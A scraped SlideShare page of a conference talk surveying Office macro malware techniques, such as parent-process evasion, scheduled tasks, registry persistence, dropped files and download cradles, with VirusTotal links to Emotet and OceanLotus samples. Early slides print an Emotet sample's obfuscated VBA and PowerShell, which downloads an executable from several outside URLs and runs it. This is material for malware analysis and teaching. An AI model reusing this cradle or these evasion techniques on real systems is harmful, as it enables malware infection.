SlideShare une entreprise Scribd logo

Macro malware common techniques - public

Security Bootcamp
Security Bootcamp

Kienmanowar - Macro malware common techniques - public

Technologie
1  sur  66
Télécharger pour lire hors ligne
Macro malware – Common Techniques <m4n0w4r> 9/16/2019 Macro malware - common techniques 1
#Wh0_4m_1? 1. @kienmanowar/@m4n0w4r 2. Twitter: @kienbigmummy 3. Company: 4. Blog: kienmanowar.wordpress.com 5. Writer for tradahacking.vn 9/16/2019 Macro malware - common techniques 2
Agenda • Typical Method • Evading Parent/Child Analysis • Scheduled Task Creation • Registry Modification • Dropping Files • Download File 9/16/2019 Macro malware - common techniques 3
Cyber Kill Chain Model by Lockheed Martin (Intelligence-Driven Computer Network Defense) 9/16/2019 Macro malware - common techniques 4
The Typical Method 9/16/2019 Macro malware - common techniques 5
Emotet variant 9/16/2019 Macro malware - common techniques 6 https://www.virustotal.com/gui/file/fdd6288747eb976a863966935b7800b1ed839ded3fe15dfa039a2c6f68b940b
VBA code 9/16/2019 Macro malware - common techniques 7
Code from VBA Modules VBA.Shell$ iphSIiNfaNjTt, 0 Function iphSIiNfaNjTt() iphSIiNfaNjTt = aPNnoXoRGKMH + TiaBlsUalNnM + Chr(34) + PDmnv + RswVlbiC + vColwfOi + OzfjstduXoj + zBYLwoLni + pnThlsfRP + Gfccqau + LQjdFQhEO + JstYsN + sDwChEYslpP + zDTGrVwpTAR + mitjmD + ciSOwmuuE + WEPLobW + vqfEdabPIV + vJOMi + UXiBTISI + dfhFU + nwoRcLWNZSV + NCMSjazF + RjwDOIFiGzs + ohQcC + RlVzAwiHW + RifikIkmi + FCRNXlL Function aPNnoXoRGKMH() aPNnoXoRGKMH = zilMH + pcrOzYMPXCi + WbDnCzlCK + pDUqAABFGh + lUoibmOjr + KhVOwsl + HDQPmHVYiD + GzWjGEcXiX + ZwlCz + dCjRnjGNz + nlUHZPnE + HEaiojkVdDO + XFjnjbjmqJl + kqjwHUq + piantJ + rbEDwpNc + QzYmE + nrJILEn + ELizU + MqfiQmS + LOokRDhqqN + IalQpFoPE + WarbPVl + MMjcSjVm + iruMBLDcwO + RmkFihGQtT + ArUkXJj + OBwrdhtvBW + LVzEDLjRQ + DjYuFmCTTb + pTfFmQL + cqWwPkKsqz + bICZzvUpr + CrQFN + hDTBAKT + OBMNt + mMIiPM + VVwsdSc + cQYjuhzP + YrjGfpqCsh + LcobGJwo + sTYPbGYDlY + niSmUt + CGnOlwKbSU + cwnETzznnOA + XuaUi Sub AutoOpen() Function TiaBlsUalNnM() TiaBlsUalNnM = TjwZuOEuD + pNnCVwPqc + nJjPqlMU + bUkkvzm + BwpYcYDBvwJ + rwUqquf + HzXlmSLam + QWFwhK + uWzPz + zBMjmZtjcta + mUCjUokNWi + CIEnrYmn + cNibOLwTH + pBaLfCn + EJOFwt + XBTEJrDCU + OCcJVHjp + ZnaGFFBj + tXLGhr + vwOZE + mVOJSknpq + lcObnwwZdL + ANZAwiDb + fbiaJQGX + qPAaHtT + fEfOho + tAIPPEJcL + zmaMGDoLTX + zDHkzGhR + DrWNQJz + uPzAhno + LGziXMAdoL + WVZkI + VipSi + IAjpSiYwj + hnTWVhb + ZOrnliBU 9/16/2019 Macro malware - common techniques 8
Decoded VBA call to obfuscated powershell cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set %jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set %DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%! "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd =k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect randok9B+k9Bm;ki4T+'+'i4T9i'+'4T+i4TB+k9BrONbk9B+k9Bck'+'9B+k9Bd = Hk9B+k9B1Ihtk9B+k9Btp:k9B+k9B//cok9B+k9i4T+i4TBffeybarn.com/Qq3sk9i4T+i4TB+k9BDS0/,ki4T+i4T9B+k9Bhttpi4T+i4T://e asyfook9B+k9Bd.us/'+'Gk9B+k9B4Vk9B+k9BaoW/k9B'+'+k9B,https://icbk9B+'+'k9Bb.uk9B+k9Bnuk9B+k9Bdk9B+k9B.ac.ik9B+k9 Bdk9B+k9i4T+i4TB'+'/k9B+k9B0XSX0/'+'k9B+k9B,k9B+k9Bhttpki'+'4T+i4T9B+k9B://'+'fk9B+k9Bi4T+i4Testival-dk9B+i 4T+i4Tk9Bruk9B+k9'+'Bzba.'+'ck9B+k9Bom.ua'+'/k9B+k9i4T+i4TBr4Ik9B+k9Bwzk9B+k'+'9B/,http:/k9B+k9B/k9B+ki4T+i4T9Bp lak9B+k9Bn.gotk9B+k9Beborg2021k9B+k9Bi4T+i4T.wek9B'+'+k9Bbadmini4T+i4T8.nek9i4T+i4TB+k9'+'Bt/wpk9B+k9B- i4T+i4Tcok9B+k9Bntent/t'+'hek9B+k9Bmk9B+k9Bek9B+k9Bs/k9B+k9Bgotebk9B'+'+k9Borg/fhYk9B+k9Bmi4T+i4T/H1i4T+i4TI.Spk 9B+k'+'9Bli4T+i4'+'Tit'+'(H1I,H1'+'I);rOk9B+k9B'+'Nkarapas = '+'rk9B+k9BONnsadasd'+'i4T+i4'+'Tk9'+'B+k9B.nk9B+k9Bek9B+k9Bxk9B+k9Btk9B+k9i4T+i4TB'+'(k9B+k9B1, k9B+k9B3k9B+k9B4k9B+k9B3ki4T+i4T9B'+'+k9B24k9B+k9Bi4T+i4T5);rONk9B+k9Bhuas =ki4T+i'+'4T9B+k9B rONenv:puk9B+k9Bblik9B+k9Bi4T+i4Tc + H1k9B'+'+k9B'+'IN5oH1I +k9B+k9B rk9B+k9BOk9B+k9BNkarapi4T+i4Tas + H1I.exeH1k9B+k9BI;forek9B+k9'+'Bach(rOk9B+k9BNab'+'c ii4T+i4Tnk9B+k'+'9B rk9B+k9BONbcd){k9B+k9Btrk9B+k9By{rON'+'f'+'ri4T+i4Tanc.Downloai4T+i4TdFi4T+i4Tile(rk9B+k9BO'+'Nk9B+k9B'+'ai4T+i4 Tbck9'+'B+k'+'9B.Tki4T'+'+i4T9B+k9Bok9i4T+i4TB+k9BString(),i4T+i4T rONhk9B+k9Buki4T+i4T9B+k9Bas);k9B+k9BInvoke- k9B+k9BItem(k9B+k9Br'+'ONhuas)k9B+k9B;k9i4T+i 4TB+k9Bbreak9B+k9Bk;}catch{i4T+i4'+'Twritk9B+k9Bek9B+k9B'+'-k9B+k9Bh'+'k9B+k9Bost rON'+'_.k9B+k9BEk9B+k9Bxcept'+'ion.i4T+i4TMek9B+k9Bssage;}}k9B).rEPlACE(k9BrONk9B,k9BrcWk9B).rEP'+'lACE(([chAR]7 8+[chAR]53+[chAR]111),[Si4T+i4TtrING][chAR]92).rEPlACE(([chi4T+i4TAR]72+[ch'+'AR]49+[chAR]73),[StrING][chAR]39'+ ')GLo& ('+' rcWENv:p'+'uBi4T+i4TLi4T+i4TIC[13]+rcWENv:PuBLIc[5]+k9BXk9B)i4T) - cReplaCe([Char]71+[Char]76+[Char]111'+'),[Char]124 -rEPLaCE([Char]114+[Cha'+'r]99+[Char]87),[Char]36 - cReplaCei4Tk9Bi'+'4T,[Char]39) JYX &( ([STriNg]EzevERboSeprEFErEnCE)[1,3]+i4TXi4T-JoIni4Ti4T)') -rEPlaCe ([ChAr]69+[ChAr]122+[ChAr]101),[ChAr]36 -CrePLace([ChAr]105+[ChAr]52+[ChAr]84),[ChAr]39 -rEPlaCe 'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X') 9/16/2019 Macro malware - common techniques 9
9/16/2019 Macro malware - common techniques 10
Decoded powershell 9/16/2019 Macro malware - common techniques 11
Evading Parent/Child Analysis 9/16/2019 Macro malware - common techniques 12
• This behavior is relatively anomalous and can easily be detected by most modern blue-teams. 9/16/2019 Macro malware - common techniques 13
Spawning via WmiPrvse.exe using wmi https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes • New process will be spawned under “wmiprvse.exe” instead of the Office process. The code to perform this is below: 9/16/2019 Macro malware - common techniques 14
Spawning via ShellCOM • https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ • https://github.com/tyranid/oleviewdotnet (James Forshaw) 9/16/2019 Macro malware - common techniques 15
Spawning via ShellCOM • Sample code using ShellBrowserWindow : https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html 9/16/2019 Macro malware - common techniques 16
Spawning via ShellCOM • Sample code using ShellWindows : 9/16/2019 Macro malware - common techniques 17
Parent PID Spoofing with CreateProcessA • The API call CreateProcessA supports a parameter called “lpStartupInfo” where you can essentially define the parent process you want to use. – lpStartupInfo parameter points to a STARTUPINFOEX structure 9/16/2019 Macro malware - common techniques 18
Sample in the wild https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/ 9/16/2019 Macro malware - common techniques 19
1st stage VBA Code 9/16/2019 Macro malware - common techniques 20
Decoded base64 String 9/16/2019 Macro malware - common techniques 21
2nd VBA code (1) 9/16/2019 Macro malware - common techniques 22
dllhost.exe run as child of explorer.exe 9/16/2019 Macro malware - common techniques 23
2nd VBA code (2) 9/16/2019 Macro malware - common techniques 24
Scheduled Task Creation 9/16/2019 Macro malware - common techniques 25
• VBScript supports us create Scheduled Tasks, which can be abused to not only related to activity from Office (svchost.exe will spawn the task). – Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger- example--scripting- 9/16/2019 Macro malware - common techniques 26
Sample in the wild https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 9/16/2019 Macro malware - common techniques 27
Extract out the VBA Macro code 9/16/2019 Macro malware - common techniques 28
Sub Document_Open() 9/16/2019 Macro malware - common techniques 29
Sub Document_Close() 9/16/2019 Macro malware - common techniques 30
A sample of APT32 (aka OceanLotus) https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876 9/16/2019 Macro malware - common techniques 31
9/16/2019 Macro malware - common techniques 32
9/16/2019 Macro malware - common techniques 33
9/16/2019 Macro malware - common techniques 34
9/16/2019 Macro malware - common techniques 35
Registry Modification 9/16/2019 Macro malware - common techniques 36
• VBScript also allows access to the registry - allowing the storing of payloads, modification of settings, and creation of persistence entries directly from a macro (using WMI or WScript) – Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks-- registry 9/16/2019 Macro malware - common techniques 37
Wild wild west https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e0249/16/2019 Macro malware - common techniques 38 https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
Extract out the VBA Macro code 9/16/2019 Macro malware - common techniques 39
9/16/2019 Macro malware - common techniques 40
Write 1st decoded base64 to "C:ProgramDataWindowsDefender.ini" 9/16/2019 Macro malware - common techniques 45
Write 2nd decoded base64 to "C:ProgramDataDefender.sct" 9/16/2019 Macro malware - common techniques 46
Write 3rd decoded base64 to "C:ProgramDataDefenderService.inf" 9/16/2019 Macro malware - common techniques 47
LoL_Bin (Living Off The Land) 9/16/2019 Macro malware - common techniques 48
9/16/2019 Macro malware - common techniques 49
Another #OceanLotus sample 9/16/2019 Macro malware - common techniques 50 https://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007
VBA code 9/16/2019 Macro malware - common techniques 51
Dropping Files 9/16/2019 Macro malware - common techniques 52
• Dropping files has its pros and cons. Making changes to disk can often mean payloads are analyzed by antivirus and leave forensic artefacts. Yet in most breaches attackers still use payloads dropped to disk due to the convenience and ease of having a solid foothold in a network. • In VBScript we can make use of the FileSystemObject to drop files. 9/16/2019 Macro malware - common techniques 53
Again another sample of #OceanLotus…. 9/16/2019 Macro malware - common techniques 54 https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
VBA code… 9/16/2019 Macro malware - common techniques 55
Dropping dll file 9/16/2019 Macro malware - common techniques 56
Another sample https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7 9/16/2019 Macro malware - common techniques 57 https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
VBA Code – Get Base64 data 9/16/2019 Macro malware - common techniques 58
VBA Code – Decode b64 and execute payload 9/16/2019 Macro malware - common techniques 59
Download file 9/16/2019 Macro malware - common techniques 60
• There are multiple ways VBScript can be used to download content. This content can then be dropped to disk, inserted into the registry or injected into memory. • One of the most common and simplest methods is using the XMLHTTP library along with ADODB to output to file. • Another option would be to use a direct API call, for example a simple VBScript download cradle can be implemented using URLDownloadToFileA. 9/16/2019 Macro malware - common techniques 61
Some sample code 9/16/2019 Macro malware - common techniques 62
Sample https://www.virustotal.com/gui/file/e2d878a43607c04f151052e81a560a80525a343ea4e719c3a79e1cc8c45e47c5 9/16/2019 Macro malware - common techniques 63
Extract out VBA code 9/16/2019 Macro malware - common techniques 64
Extract out VBA code 9/16/2019 Macro malware - common techniques 65
9/16/2019 Macro malware - common techniques 66
Other sample https://www.virustotal.com/gui/file/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd 9/16/2019 Macro malware - common techniques 67
VBA Code 9/16/2019 Macro malware - common techniques 68
9/16/2019 Macro malware - common techniques 69
End! 9/16/2019 Macro malware - common techniques 70

Recommandé

Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
What if everything is awesome? Codemotion Madrid 2014
What if everything is awesome? Codemotion Madrid 2014What if everything is awesome? Codemotion Madrid 2014
What if everything is awesome? Codemotion Madrid 2014Christian Heilmann
 
oracleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdforacleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdfssuser785ce21
 
Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Mahmoud Hatem
 
AMKSS Career Conference 2018: Software Engineering
AMKSS Career Conference 2018: Software EngineeringAMKSS Career Conference 2018: Software Engineering
AMKSS Career Conference 2018: Software EngineeringMelvin Zhang
 
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)Cis1-193-Rowe-Erin-exam 2 b(handson-lab)
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)erowe3
 
Open source drones_in_everyday_life
Open source drones_in_everyday_lifeOpen source drones_in_everyday_life
Open source drones_in_everyday_lifeYoon Chun Nicholas Ng
 
Is it us or them (third parties)
Is it us or them (third parties)Is it us or them (third parties)
Is it us or them (third parties)Dave Whyte
 

Recommandé

Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
What if everything is awesome? Codemotion Madrid 2014
What if everything is awesome? Codemotion Madrid 2014What if everything is awesome? Codemotion Madrid 2014
What if everything is awesome? Codemotion Madrid 2014Christian Heilmann
 
oracleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdforacleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdfssuser785ce21
 
Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Mahmoud Hatem
 
AMKSS Career Conference 2018: Software Engineering
AMKSS Career Conference 2018: Software EngineeringAMKSS Career Conference 2018: Software Engineering
AMKSS Career Conference 2018: Software EngineeringMelvin Zhang
 
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)Cis1-193-Rowe-Erin-exam 2 b(handson-lab)
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)erowe3
 
Open source drones_in_everyday_life
Open source drones_in_everyday_lifeOpen source drones_in_everyday_life
Open source drones_in_everyday_lifeYoon Chun Nicholas Ng
 
Is it us or them (third parties)
Is it us or them (third parties)Is it us or them (third parties)
Is it us or them (third parties)Dave Whyte
 
6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdfEMERSON EDUARDO RODRIGUES
 
Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Dariush Nasirpour
 
台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業AI.academy
 
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Scilab
 
Data Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicData Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicUlf Mattsson
 
HackCon - SPF
HackCon - SPFHackCon - SPF
HackCon - SPFAdam Compton
 
Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...►David Clarke FBCS CITP
 
Camaras black magik
Camaras black magikCamaras black magik
Camaras black magikJairoACS
 
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGBuild Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGMatthew McCullough
 
Packet Sniffer
Packet Sniffer Packet Sniffer
Packet Sniffer vilss
 
Making a Better World with Technology Innovations
Making a Better World with Technology InnovationsMaking a Better World with Technology Innovations
Making a Better World with Technology InnovationsImesh Gunaratne
 
How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)Druva
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET Journal
 
Automated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerAutomated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerKyungmin Lee
 
Emerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarEmerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarISSA LA
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Tzung-Bi Shih
 
Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1ecommerce poland expo
 
Exploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolExploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolKoan-Sin Tan
 
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdfdino715195
 
Azure Industrial Iot Edge
Azure Industrial Iot EdgeAzure Industrial Iot Edge
Azure Industrial Iot EdgeRiccardo Zamana
 
Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfSecurity Bootcamp
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecuritySecurity Bootcamp
 

Contenu connexe

Similaire à Macro malware common techniques - public

6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdfEMERSON EDUARDO RODRIGUES
 
Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Dariush Nasirpour
 
台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業AI.academy
 
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Scilab
 
Data Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicData Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicUlf Mattsson
 
Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...►David Clarke FBCS CITP
 
Camaras black magik
Camaras black magikCamaras black magik
Camaras black magikJairoACS
 
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGBuild Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGMatthew McCullough
 
Packet Sniffer
Packet Sniffer Packet Sniffer
Packet Sniffer vilss
 
Making a Better World with Technology Innovations
Making a Better World with Technology InnovationsMaking a Better World with Technology Innovations
Making a Better World with Technology InnovationsImesh Gunaratne
 
How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)Druva
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET Journal
 
Automated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerAutomated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerKyungmin Lee
 
Emerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarEmerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarISSA LA
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Tzung-Bi Shih
 
Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1ecommerce poland expo
 
Exploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolExploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolKoan-Sin Tan
 
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdfdino715195
 
Azure Industrial Iot Edge
Azure Industrial Iot EdgeAzure Industrial Iot Edge
Azure Industrial Iot EdgeRiccardo Zamana
 

Similaire à Macro malware common techniques - public (20)

6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf
 
Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)
 
台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業
 
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
 
Data Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicData Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus Pandemic
 
HackCon - SPF
HackCon - SPFHackCon - SPF
HackCon - SPF
 
Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...
 
Camaras black magik
Camaras black magikCamaras black magik
Camaras black magik
 
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGBuild Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUG
 
Packet Sniffer
Packet Sniffer Packet Sniffer
Packet Sniffer
 
Making a Better World with Technology Innovations
Making a Better World with Technology InnovationsMaking a Better World with Technology Innovations
Making a Better World with Technology Innovations
 
How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
 
Automated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerAutomated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracer
 
Emerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarEmerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovar
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
 
Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1
 
Exploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolExploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source Tool
 
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
 
Azure Industrial Iot Edge
Azure Industrial Iot EdgeAzure Industrial Iot Edge
Azure Industrial Iot Edge
 

Plus de Security Bootcamp

Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfSecurity Bootcamp
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecuritySecurity Bootcamp
 
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewNguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewSecurity Bootcamp
 
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
